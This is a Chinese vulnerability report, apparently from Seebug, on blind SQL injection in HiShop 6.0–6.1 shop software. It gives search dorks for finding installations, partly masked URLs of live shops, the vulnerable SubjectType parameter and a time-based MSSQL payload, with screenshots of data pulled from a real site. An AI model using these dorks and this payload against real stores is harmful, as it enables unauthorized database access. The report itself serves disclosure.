HiShop网上商店系统多版本SQL注入

### 简要描述： HiShop全称“长沙海商网络技术有限公司”，是国内最大的ASP.NET独立网店服务提供商。长期专注于B2C网上购物软件的研发及相关增值服务的提供。拥有著名网上商店系统品牌——HiShop。公司的主要业务是为中小企业、个人网商及网站站长提供B2C独立购物网站搭建的一站式套餐服务及网店推广、货源提供、个性定制等相关增值服务。 ### 详细说明： 之前提交给wooyun，一直没反应！ 主要是Hishop6.0-Hishop6.1版本存在此处注入，不是开源的，黑盒来吧 关键字: ``` powered by Hishop6.0 ``` ``` powered by Hishop6.1 ``` 用量不小，百度搜索看下 [<img src="https://images.seebug.org/upload/201601/131201479142bec0696922748cdb75a9484f1f5d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201601/131201479142bec0696922748cdb75a9484f1f5d.png) [<img src="https://images.seebug.org/upload/201601/131202254bb5804019d7dd840c33c64d9df5dec0.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201601/131202254bb5804019d7dd840c33c64d9df5dec0.png) 搜索筛选处，勾选任意选项 [<img src="https://images.seebug.org/upload/201601/13120350b5fc9ea6121328cbba1e900243bd8e84.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201601/13120350b5fc9ea6121328cbba1e900243bd8e84.png) http://**.**.**.**/listProduct.aspx?SubjectType=1&pageIndex=1&pageSize=20 http://www.del***.com/SubCategory.aspx?SubjectType=2&pageIndex=1&pageSize=20 http://yishi***.com/listProduct.aspx?SubjectType=1&pageIndex=1&pageSize=20 ``` 注入参数#SubjectType ``` 美中不足的是只能盲注 ``` Payload:AS lmka WHERE 2285=2285 WAITFOR DELAY '0:0:5'-- ``` ### 漏洞证明： [<img src="https://images.seebug.org/upload/201601/13122348bcf8c9c31ab66854f0d4cf667fd76870.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201601/13122348bcf8c9c31ab66854f0d4cf667fd76870.png) 有些不太友善，手工简单检测一下吧， [<img src="https://images.seebug.org/upload/201601/131227493eaf84dc4ecc822a58feed1f410c0a86.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201601/131227493eaf84dc4ecc822a58feed1f410c0a86.png) //MSSQL版本 [<img src="https://images.seebug.org/upload/201601/1312284381268734af2acad73d1e15d3396fdb85.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201601/1312284381268734af2acad73d1e15d3396fdb85.png) //本地服务名 [<img src="https://images.seebug.org/upload/201601/13122957612a7ca2e79a1dc22398d0becfb8bab5.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201601/13122957612a7ca2e79a1dc22398d0becfb8bab5.png) //当前数据库用户 [<img src="https://images.seebug.org/upload/201601/131230500f31794469288d89bb085f24e16ed624.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201601/131230500f31794469288d89bb085f24e16ed624.png)